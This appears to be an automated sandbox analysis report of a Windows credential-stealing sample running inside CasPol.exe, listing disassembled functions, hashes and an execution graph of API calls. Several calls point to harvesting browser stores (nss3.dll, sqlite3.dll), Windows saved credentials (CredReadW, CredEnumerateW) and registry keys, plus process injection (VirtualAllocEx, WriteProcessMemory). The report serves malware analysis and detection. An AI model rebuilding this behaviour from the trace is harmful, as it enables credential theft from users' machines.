                                                                                                                                                                                  Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                  • String ID: sqlite3.dll
                                                                                                                                                                                  • API String ID: 1983510840-1155512374
                                                                                                                                                                                  • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                  • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                                                  • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                                                  Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString
                                                                                                                                                                                  • String ID: A4@$Server Details
                                                                                                                                                                                  • API String ID: 1096422788-4071850762
                                                                                                                                                                                  • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                  • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                  Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                  • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                  • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                  • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                  • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                  Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                  • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3110682361-0
                                                                                                                                                                                  • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                  • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                  • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                  Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3510742995-0
                                                                                                                                                                                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                  Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                                  • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                  • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                  • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                  Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                  • free.MSVCRT ref: 0040799A
                                                                                                                                                                                    • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                    • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                    • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                  • free.MSVCRT ref: 004079BD
                                                                                                                                                                                  • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                                                                  • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                  • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                  • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                  • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:13.8%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                                                                  Signature Coverage:2.7%
                                                                                                                                                                                  Total number of Nodes:1726
                                                                                                                                                                                  Total number of Limit Nodes:46
                                                                                                                                                                                  execution_graph 6624 413d44 6627 413d1e 6624->6627 6626 413d4d 6628 413d27 _onexit 6627->6628 6629 413d2d __dllonexit 6627->6629 6628->6629 6629->6626 8686 4140c4 8689 413d44 8686->8689 8690 413d1e 2 API calls 8689->8690 8691 413d4d 8690->8691 8126 405b5a 8127 405b72 8126->8127 8128 405c39 8126->8128 8130 405b82 memset 8127->8130 8134 405be7 8127->8134 8158 402c27 8128->8158 8140 40876f 8130->8140 8134->8128 8138 405c28 _mbscpy 8134->8138 8135 40876f 12 API calls 8136 405bb5 sprintf 8135->8136 8137 405bdd 8136->8137 8153 412396 SHGetMalloc 8137->8153 8138->8128 8141 408778 8140->8141 8142 40877d 8140->8142 8162 4086ed 8141->8162 8144 405bac 8142->8144 8145 4087e0 _mbscpy 8142->8145 8146 4087ad 8142->8146 8144->8135 8165 408bf9 _itoa 8145->8165 8147 408838 LoadStringA 8146->8147 8149 408842 8147->8149 8149->8144 8152 408863 memcpy 8149->8152 8151 408802 strlen 8151->8146 8151->8149 8152->8144 8154 4123b0 SHBrowseForFolder 8153->8154 8156 412406 8153->8156 8155 4123e4 SHGetPathFromIDList 8154->8155 8154->8156 8155->8156 8157 4123f6 _mbscpy 8155->8157 8156->8134 8157->8156 8159 402c5b 8158->8159 8160 402c34 8158->8160 8160->8159 8161 402c4b EndDialog 8160->8161 8161->8159 8163 4086f6 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 8162->8163 8164 40876e 8162->8164 8163->8164 8164->8142 8168 408c31 8165->8168 8167 4087fb 8167->8146 8167->8151 8169 414060 8168->8169 8170 408c3e memset GetPrivateProfileStringA 8169->8170 8171 408c87 _mbscpy 8170->8171 8172 408c9d 8170->8172 8171->8167 8172->8167 6011 411e70 6014 411d37 6011->6014 6013 411e90 6015 411d43 6014->6015 6016 411d55 GetPrivateProfileIntA 6014->6016 6019 411c43 memset _itoa WritePrivateProfileStringA 6015->6019 6016->6013 6018 411d50 6018->6013 6019->6018 6630 40f105 6631 40f117 6630->6631 6632 40f12a 6630->6632 6631->6632 6839 40e54d 6631->6839 6633 40f136 6632->6633 6673 40da79 6632->6673 6636 40f14c 6633->6636 6850 40dfd9 6633->6850 6637 40f167 6636->6637 6862 40e0a1 6636->6862 6639 40f173 6637->6639 6707 40e725 6637->6707 6642 40f191 6639->6642 6720 40260a 6639->6720 6644 40f1af 6642->6644 6731 402834 6642->6731 6646 40f1bb 6644->6646 6875 40eb3d 6644->6875 6648 40f1c9 6646->6648 6892 40ea56 6646->6892 6650 40f1e7 6648->6650 6651 40f1cf 6648->6651 6653 40f1f2 6650->6653 6743 40d9b9 memset memset 6650->6743 6909 40efc1 6651->6909 6656 40f1fe 6653->6656 6750 40d935 memset GetWindowsDirectoryA GetVolumeInformationA 6653->6750 6657 40f232 6656->6657 6755 407f7e 6656->6755 6661 40f250 6657->6661 6785 410b95 memset memset 6657->6785 6658 40efc1 34 API calls 6658->6650 6664 40f26f 6661->6664 6796 410f07 6661->6796 6667 40f27f 6664->6667 6811 40f09c memset 6664->6811 6821 40e675 memset 6667->6821 6923 40fd01 memset memset 6673->6923 6675 40dab7 RegOpenKeyExA 6678 40daa9 6675->6678 6676 40daed RegOpenKeyExA 6676->6678 6678->6675 6678->6676 6680 40db7b RegOpenKeyExA 6678->6680 6683 406958 strlen memcpy 6678->6683 6924 40ff88 6678->6924 6979 40fe5d RegQueryValueExA 6678->6979 6681 40dbaf 6680->6681 6682 40db95 6680->6682 6685 40dc11 RegOpenKeyExA 6681->6685 6686 406958 2 API calls 6681->6686 6992 40fd2e RegQueryValueExA 6682->6992 6683->6678 6687 40dc45 6685->6687 6688 40dc2b 6685->6688 6689 40dbe0 6686->6689 6692 406958 2 API calls 6687->6692 6701 40dc89 6687->6701 6690 40fd2e 9 API calls 6688->6690 6691 406958 2 API calls 6689->6691 6690->6687 6693 40dbf3 6691->6693 6695 40dc76 6692->6695 6693->6685 6697 406958 2 API calls 6695->6697 6697->6701 6700 40dcd8 7005 404ce0 6700->7005 6939 4103f1 6701->6939 6705 404ce0 FreeLibrary 6706 40dce8 6705->6706 6706->6633 7333 411d68 RegOpenKeyExA 6707->7333 6709 40e744 6710 40e8f3 6709->6710 6711 40e74f memset memset memset memset 6709->6711 6710->6639 7334 411dee RegEnumKeyExA 6711->7334 6713 40e7c5 sprintf 6715 411dae 3 API calls 6713->6715 6714 40e8ea RegCloseKey 6714->6710 6718 40e7bd 6715->6718 6716 40e803 strlen 6716->6718 6718->6713 6718->6714 6718->6716 6719 40e85b _mbscpy _mbscpy 6718->6719 7335 411dee RegEnumKeyExA 6718->7335 6719->6718 6721 406b2a GetVersionExA 6720->6721 6722 40261a 6721->6722 6723 402622 RegOpenKeyExW 6722->6723 6724 40272a 6722->6724 6723->6724 6725 402646 memset memset 6723->6725 6724->6642 6726 40270a RegEnumValueW 6725->6726 6727 402721 RegCloseKey 6726->6727 6728 4026a8 wcscpy 6726->6728 6727->6724 7336 40244d memset WideCharToMultiByte 6728->7336 7343 411d68 RegOpenKeyExA 6731->7343 6733 402850 6734 4028e3 6733->6734 6735 40285b memset 6733->6735 6734->6644 7344 411dee RegEnumKeyExA 6735->7344 6737 4028dc RegCloseKey 6737->6734 6739 402888 6739->6737 7345 411d68 RegOpenKeyExA 6739->7345 7346 402730 6739->7346 7353 411dee RegEnumKeyExA 6739->7353 7354 413735 memset 6743->7354 6746 406958 2 API calls 6747 40da40 6746->6747 6748 406958 2 API calls 6747->6748 6749 40da53 6748->6749 6749->6653 7439 40d794 6750->7439 6753 40d9b3 6753->6656 6754 40d794 24 API calls 6754->6753 6756 407f8b 6755->6756 7468 407c79 11 API calls 6756->7468 6760 407fa8 6761 407fb3 memset 6760->6761 6762 408077 6760->6762 7471 411dee RegEnumKeyExA 6761->7471 6773 407bc6 6762->6773 6764 408072 RegCloseKey 6764->6762 6766 407fe4 6766->6764 6767 408006 memset 6766->6767 7472 411d68 RegOpenKeyExA 6766->7472 7486 411dee RegEnumKeyExA 6766->7486 6768 411d82 RegQueryValueExA 6767->6768 6770 408039 6768->6770 7473 407e33 strlen 6770->7473 7487 411d68 RegOpenKeyExA 6773->7487 6775 407be4 6776 407c73 6775->6776 6777 407bef memset 6775->6777 6776->6657 7488 411dee RegEnumKeyExA 6777->7488 6779 407c6e RegCloseKey 6779->6776 6781 407c1d 6781->6779 7489 411d68 RegOpenKeyExA 6781->7489 7490 407a93 memset RegQueryValueExA 6781->7490 7503 411dee RegEnumKeyExA 6781->7503 6786 41223f 10 API calls 6785->6786 6787 410be4 strlen strlen 6786->6787 6788 410c07 6787->6788 6790 410c1a 6787->6790 6789 406b4b 4 API calls 6788->6789 6789->6790 7504 4069d3 GetFileAttributesA 6790->7504 6792 410c31 6793 410c45 6792->6793 6794 410c36 6792->6794 6793->6661 7505 410ac5 6794->7505 7557 411d68 RegOpenKeyExA 6796->7557 6798 410f25 6799 410f30 memset 6798->6799 6800 411025 6798->6800 7558 411dee RegEnumKeyExA 6799->7558 6800->6664 6802 41101c RegCloseKey 6802->6800 6804 410f7f memset 6806 411d82 RegQueryValueExA 6804->6806 6807 410f5d 6806->6807 6807->6802 6807->6804 6808 411d82 RegQueryValueExA 6807->6808 6810 410ff3 RegCloseKey 6807->6810 7559 411d68 RegOpenKeyExA 6807->7559 7560 410e85 strlen 6807->7560 7562 411dee RegEnumKeyExA 6807->7562 6808->6807 6810->6807 6812 41223f 10 API calls 6811->6812 6813 40f0db 6812->6813 6814 406efe 3 API calls 6813->6814 6815 40f0e5 6814->6815 7563 4069d3 GetFileAttributesA 6815->7563 6817 40f0ee 6818 40f0f3 6817->6818 6819 40f0ff 6817->6819 7564 405ae8 6818->7564 6819->6667 7590 40f9a0 6821->7590 6824 40e6bc 7603 4064fb 6824->7603 6829 40e5d3 6830 40e5e9 6829->6830 6831 407364 7 API calls 6830->6831 6832 40e644 6831->6832 7772 4085b9 6832->7772 6836 40e661 7790 40819f 6836->7790 7871 40e4b6 memset strlen strlen 6839->7871 6841 40e5cb 6841->6632 6843 40783b 9 API calls 6848 40e592 6843->6848 6844 407898 9 API calls 6844->6848 6845 40e5c0 6847 407930 FindClose 6845->6847 6846 407800 2 API calls 6846->6848 6847->6841 6848->6844 6848->6845 6848->6846 6849 40e54d 33 API calls 6848->6849 6849->6848 6851 40e012 6850->6851 6853 40e05d 6851->6853 6854 40e031 6851->6854 7896 40dd65 6851->7896 6853->6636 6855 40783b 9 API calls 6854->6855 6860 40e05b 6855->6860 6856 407898 9 API calls 6856->6860 6857 40e08e 6859 407930 FindClose 6857->6859 6858 407800 2 API calls 6858->6860 6859->6853 6860->6856 6860->6857 6860->6858 6861 40dfd9 30 API calls 6860->6861 6861->6860 6863 414060 6862->6863 6864 40e0ae memset strlen strlen 6863->6864 6865 40e0fe GetPrivateProfileIntA 6864->6865 6866 40e0eb 6864->6866 6869 40e28c 6865->6869 6874 40e12e 6865->6874 6868 406b4b 4 API calls 6866->6868 6868->6865 6869->6637 6870 40e133 8 API calls 6870->6874 6871 4029d9 strlen 6871->6874 6872 40dcf2 strtoul 6872->6874 6873 406958 strlen memcpy 6873->6874 6874->6869 6874->6870 6874->6871 6874->6872 6874->6873 6876 40ec1a 6875->6876 6877 40eb5c memset strlen strlen 6875->6877 6876->6646 6878 40eb93 6877->6878 6879 40eba9 6877->6879 6880 406b4b 4 API calls 6878->6880 6879->6876 7915 4069d3 GetFileAttributesA 6879->7915 6880->6879 6882 40ebc8 6882->6876 7916 412d65 6882->7916 6886 40ebfd 6887 40ec0f 6886->6887 7937 412f4b 6886->7937 7957 412e4d 6887->7957 6893 40eb33 6892->6893 6894 40ea75 memset strlen strlen 6892->6894 6893->6648 6895 40eac2 6894->6895 6896 40eaac 6894->6896 6895->6893 8008 4069d3 GetFileAttributesA 6895->8008 6897 406b4b 4 API calls 6896->6897 6897->6895 6899 40eae1 6899->6893 6900 412d65 6 API calls 6899->6900 6901 40eaf1 6900->6901 6902 412f02 6 API calls 6901->6902 6903 40eb16 6902->6903 6904 40eb28 6903->6904 6905 412f4b 12 API calls 6903->6905 6906 412e4d 9 API calls 6904->6906 6907 40eb21 6905->6907 6906->6893 6908 40d1a5 22 API calls 6907->6908 6908->6904 6910 40f093 6909->6910 6911 40efd6 6909->6911 6910->6658 6912 40783b 9 API calls 6911->6912 6913 40effd 6912->6913 6914 407898 9 API calls 6913->6914 6919 40f008 6914->6919 6915 40f088 6916 407930 FindClose 6915->6916 6916->6910 6917 407898 9 API calls 6917->6919 6919->6915 6919->6917 6921 40f076 CloseHandle 6919->6921 6922 40f05d CloseHandle 6919->6922 8009 4067ba CreateFileA 6919->8009 8010 40f8a8 6919->8010 6921->6919 6922->6919 6923->6678 7008 404109 6924->7008 6931 40ffc3 CredReadW 6934 410085 6931->6934 6935 40ffda 6931->6935 6932 404ce0 FreeLibrary 6933 41009c 6932->6933 6933->6678 7024 404170 6934->7024 6935->6934 6936 41003a WideCharToMultiByte 6935->6936 6937 410061 WideCharToMultiByte 6936->6937 6938 41007a LocalFree 6936->6938 6937->6938 6938->6934 6940 414060 6939->6940 6941 4103fe RegOpenKeyExA 6940->6941 6942 40dcc1 6941->6942 6943 410428 RegOpenKeyExA 6941->6943 6953 410205 6942->6953 6944 410440 RegQueryValueExA 6943->6944 6945 41050f RegCloseKey 6943->6945 6946 410506 RegCloseKey 6944->6946 6947 41046d 6944->6947 6945->6942 6946->6945 6948 404c9d 3 API calls 6947->6948 6949 41047a 6948->6949 6949->6946 6950 4104fd LocalFree 6949->6950 6951 4104bf memcpy memcpy 6949->6951 6950->6946 7027 4100a4 6951->7027 7043 406b3b 6953->7043 6956 404109 5 API calls 6957 41023a 6956->6957 6958 41036e 6957->6958 6960 41024d CredEnumerateW 6957->6960 6962 41025c 6957->6962 6959 404170 FreeLibrary 6958->6959 6961 40dcca 6959->6961 6960->6962 6961->6700 6968 410383 6961->6968 6962->6958 6963 410296 memset WideCharToMultiByte 6962->6963 7046 40fd01 memset memset 6962->7046 6963->6962 6964 4102d1 _strnicmp 6963->6964 6964->6962 6966 4102f6 WideCharToMultiByte 6966->6962 6967 410316 WideCharToMultiByte 6966->6967 6967->6962 6969 406b06 GetVersionExA 6968->6969 6971 41038e 6969->6971 6970 4103ed 6970->6700 6971->6970 7047 4028e7 6971->7047 6974 4103ca 7056 404380 memset 6974->7056 6975 4103ba _mbscpy 6975->6974 6978 404380 149 API calls 6978->6970 6980 40ff74 RegCloseKey 6979->6980 6981 40fe9a 6979->6981 6980->6678 6981->6980 6982 40ff18 6981->6982 6983 404c9d 3 API calls 6981->6983 6984 40ff60 6982->6984 7331 4029d9 strlen 6982->7331 6989 40fec1 6983->6989 6984->6980 6985 40ff10 6987 404ce0 FreeLibrary 6985->6987 6987->6982 6988 40ff3e RegQueryValueExA 6988->6984 6989->6985 6990 40fef1 memcpy 6989->6990 6991 40ff07 LocalFree 6989->6991 6990->6991 6991->6985 6993 40fe48 RegCloseKey 6992->6993 6994 40fd6c 6992->6994 6993->6681 6994->6993 6995 404c9d 3 API calls 6994->6995 6999 40fd97 6995->6999 6996 40fdec 6997 404ce0 FreeLibrary 6996->6997 6998 40fdf4 6997->6998 6998->6993 7002 4029d9 strlen 6998->7002 6999->6996 7000 40fde3 LocalFree 6999->7000 7001 40fdc7 memcpy 6999->7001 7000->6996 7001->7000 7003 40fe17 RegQueryValueExA 7002->7003 7003->6993 7004 40fe35 7003->7004 7004->6993 7006 404cf4 7005->7006 7007 404cea FreeLibrary 7005->7007 7006->6705 7007->7006 7009 404170 FreeLibrary 7008->7009 7010 404111 LoadLibraryA 7009->7010 7011 404122 GetProcAddress GetProcAddress GetProcAddress 7010->7011 7012 40416b 7010->7012 7013 404153 7011->7013 7012->6934 7016 404c9d 7012->7016 7014 404170 FreeLibrary 7013->7014 7015 40415d 7013->7015 7014->7012 7015->7012 7017 404ce0 FreeLibrary 7016->7017 7018 404ca5 LoadLibraryA 7017->7018 7019 404cd0 7018->7019 7020 404cb6 GetProcAddress 7018->7020 7021 404cdb 7019->7021 7023 404ce0 FreeLibrary 7019->7023 7020->7019 7022 404cc9 7020->7022 7021->6931 7021->6934 7022->7019 7023->7021 7025 404180 7024->7025 7026 404176 FreeLibrary 7024->7026 7025->6932 7026->7025 7028 414060 7027->7028 7029 4100b1 RegOpenKeyExA 7028->7029 7030 4100d6 memset 7029->7030 7031 4101fe 7029->7031 7032 4101e4 RegEnumKeyA 7030->7032 7031->6950 7033 410103 RegOpenKeyExA 7032->7033 7034 4101f5 RegCloseKey 7032->7034 7035 410125 RegQueryValueExA 7033->7035 7037 41014e 7033->7037 7034->7031 7036 4101cd RegCloseKey 7035->7036 7035->7037 7036->7037 7037->7032 7037->7036 7039 406958 2 API calls 7037->7039 7042 40fd01 memset memset 7037->7042 7040 41019d WideCharToMultiByte 7039->7040 7041 4101c2 LocalFree 7040->7041 7041->7036 7042->7037 7044 406b06 GetVersionExA 7043->7044 7045 406b40 7044->7045 7045->6956 7046->6966 7065 4066e3 7047->7065 7050 402918 7052 4066e3 strncat 7050->7052 7051 40293a 7051->6974 7051->6975 7053 402922 GetProcAddress 7052->7053 7054 402933 FreeLibrary 7053->7054 7055 40292e 7053->7055 7054->7051 7055->7054 7057 41223f 10 API calls 7056->7057 7058 4043b7 7057->7058 7059 40680e 2 API calls 7058->7059 7064 4043da 7058->7064 7060 4043c2 7059->7060 7069 406efe strlen strlen 7060->7069 7064->6978 7066 406712 7065->7066 7067 4066f0 strncat 7066->7067 7068 402901 GetModuleHandleA 7066->7068 7067->7066 7068->7050 7068->7051 7070 4043cc 7069->7070 7071 406f1b _mbscat 7069->7071 7072 4042aa 7070->7072 7071->7070 7087 40783b 7072->7087 7076 40436c 7123 407930 7076->7123 7079 406b3b GetVersionExA 7082 4042ee 7079->7082 7081 404326 7081->7082 7105 404220 7081->7105 7082->7076 7082->7079 7082->7081 7083 40430c _strnicmp 7082->7083 7085 4042aa 138 API calls 7082->7085 7086 407898 9 API calls 7082->7086 7119 407800 7082->7119 7083->7081 7083->7082 7085->7082 7086->7082 7088 407930 FindClose 7087->7088 7089 407846 7088->7089 7090 406958 2 API calls 7089->7090 7091 40785a strlen strlen 7090->7091 7092 407883 7091->7092 7093 4042e3 7091->7093 7094 406b4b 4 API calls 7092->7094 7095 407898 7093->7095 7094->7093 7096 4078a3 FindFirstFileA 7095->7096 7097 4078c4 FindNextFileA 7095->7097 7098 4078df 7096->7098 7099 4078e6 strlen strlen 7097->7099 7100 4078da 7097->7100 7098->7099 7104 40791f 7098->7104 7102 407916 7099->7102 7099->7104 7101 407930 FindClose 7100->7101 7101->7098 7103 406b4b 4 API calls 7102->7103 7103->7104 7104->7082 7126 4067ba CreateFileA 7105->7126 7107 404233 7108 4042a0 7107->7108 7109 40423e GetFileSize 7107->7109 7108->7081 7110 404253 ??2@YAPAXI 7109->7110 7111 404297 CloseHandle 7109->7111 7127 406ed6 ReadFile 7110->7127 7111->7108 7114 404290 ??3@YAXPAX 7114->7111 7115 406b3b GetVersionExA 7116 404275 7115->7116 7129 4049e6 7116->7129 7120 40780a strcmp 7119->7120 7122 407832 7119->7122 7121 407821 strcmp 7120->7121 7120->7122 7121->7122 7122->7082 7124 404377 7123->7124 7125 407939 FindClose 7123->7125 7124->7064 7125->7124 7126->7107 7128 404269 7127->7128 7128->7114 7128->7115 7168 4043e4 memset 7129->7168 7132 40428d 7132->7114 7133 404a04 OpenProcess 7133->7132 7134 404a1c memset GetModuleHandleA 7133->7134 7183 411ba1 7134->7183 7137 404a61 7139 411ba1 6 API calls 7137->7139 7138 404a66 GetProcAddress 7138->7137 7140 404a77 7139->7140 7141 404a82 7140->7141 7142 404a87 GetProcAddress 7140->7142 7143 411ba1 6 API calls 7141->7143 7142->7141 7144 404a98 7143->7144 7145 404aa3 7144->7145 7146 404aa8 GetProcAddress 7144->7146 7147 411ba1 6 API calls 7145->7147 7146->7145 7148 404ab9 7147->7148 7149 404ac4 7148->7149 7150 404ac9 GetProcAddress 7148->7150 7151 404acb VirtualAllocEx VirtualAllocEx VirtualAllocEx VirtualAllocEx 7149->7151 7150->7151 7152 404c57 VirtualFreeEx VirtualFreeEx VirtualFreeEx VirtualFreeEx CloseHandle 7151->7152 7153 404b2c 7151->7153 7152->7132 7153->7152 7154 404b46 WriteProcessMemory 7153->7154 7187 40496d _mbscat _mbscpy _mbscpy 7154->7187 7156 404b65 WriteProcessMemory WriteProcessMemory 7188 411fc6 